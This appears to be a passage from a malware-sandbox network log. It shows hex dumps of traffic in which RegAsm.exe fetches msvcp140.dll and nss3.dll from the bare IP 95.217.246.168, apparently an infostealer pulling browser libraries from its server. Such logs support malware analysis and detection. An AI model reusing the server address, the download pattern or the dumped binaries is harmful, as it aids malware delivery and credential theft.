2024-04-26 09:03:13 UTC	16384	IN	Data Raw: 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 Data Ascii: H) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) sUSWV
2024-04-26 09:03:13 UTC	16384	IN	Data Raw: 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 08 8b 7c 24 08 0f 83 b0 03 00 00 85 db 0f Data Ascii: D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F\|$4rD$ D$ WVjjPS,VL$4\|$
2024-04-26 09:03:13 UTC	16384	IN	Data Raw: 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 7c 24 08 8b 4b 08 89 0c 24 89 53 04 0f a4 Data Ascii: D$4P<\|$\$t@)GD$ P08z.Jt_@u`\|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$\|$K$S
2024-04-26 09:03:13 UTC	16384	IN	Data Raw: 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 e2 fe 83 e1 01 09 d1 89 4e 04 89 30 8b 4b Data Ascii: XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKNN0K
2024-04-26 09:03:13 UTC	16384	IN	Data Raw: c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 0f 84 c2 09 00 00 80 60 04 fe 8b 4c 24 0c Data Ascii: rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H`L$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49749	95.217.246.168	443	7408	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 09:03:14 UTC	159	OUT	GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Cache-Control: no-cache
2024-04-26 09:03:15 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 09:03:14 GMT Content-Type: application/octet-stream Content-Length: 450024 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-6dde8" Accept-Ranges: bytes
2024-04-26 09:03:15 UTC	16138	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
2024-04-26 09:03:15 UTC	16384	IN	Data Raw: 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 00 2d 00 69 00 6e 00 00 00 6d 00 73 00 2d Data Ascii: hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-
2024-04-26 09:03:15 UTC	16384	IN	Data Raw: 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 8b 00 10 00 Data Ascii: {\|L@DX}0}}M@4}0}}4M@tXM}0}}XM@
2024-04-26 09:03:15 UTC	16384	IN	Data Raw: c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd e2 df e0 dd da f6 c4 44 7b 49 d9 c2 d8 c1 Data Ascii: E]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u\|_E^UQQMuU]EDB]ED{nt]B]ED{I
2024-04-26 09:03:15 UTC	16384	IN	Data Raw: f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 02 83 6d d4 01 75 ec 8b c2 85 c0 74 26 3b Data Ascii: f;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90utmut&;
2024-04-26 09:03:15 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 8b f9 83 7f 4c 00 75 04 33 db eb 24 56 e8 Data Ascii: UjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSWLu3$V
2024-04-26 09:03:16 UTC	16384	IN	Data Raw: 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 20 94 ff ff 83 7d fc 10 59 0f be 4d 14 89 Data Ascii: r@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ }YM
2024-04-26 09:03:16 UTC	16384	IN	Data Raw: 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 02 00 03 c3 89 04 f7 83 d2 00 8b da 89 5c Data Ascii: MS3R\|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s\
2024-04-26 09:03:16 UTC	16384	IN	Data Raw: 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 Data Ascii: uF\|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv\|iqY(R
2024-04-26 09:03:16 UTC	16384	IN	Data Raw: 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 74 11 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 Data Ascii: u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tWt}ErE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49750	95.217.246.168	443	7408	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 09:03:17 UTC	155	OUT	GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Cache-Control: no-cache
2024-04-26 09:03:17 UTC	248	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 09:03:17 GMT Content-Type: application/octet-stream Content-Length: 2046288 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-1f3950" Accept-Ranges: bytes
2024-04-26 09:03:17 UTC	16136	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
2024-04-26 09:03:18 UTC	16384	IN	Data Raw: 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 fe ff ff c7 41 14 0b 00 00 00 8b 51 18 Data Ascii: i)ff f@U \|AAIQQAEq@AfAAi)\f fR \|9U\|&AVQ\|A@fAfAA1<MAQAQ
2024-04-26 09:03:18 UTC	16384	IN	Data Raw: 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b 80 a0 00 00 00 83 e0 0c 83 f8 08 0f 85 Data Ascii: ti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`\|$\tD$euL$PhD$TD$E
2024-04-26 09:03:18 UTC	16384	IN	Data Raw: 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d 48 11 1e 10 89 ca 09 c2 0f 84 b1 fe ff Data Ascii: w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SLH
2024-04-26 09:03:18 UTC	16384	IN	Data Raw: 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 68 78 fc 1b 10 6a 0e e8 0a 8f 02 00 83 Data Ascii: $pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hhhxj
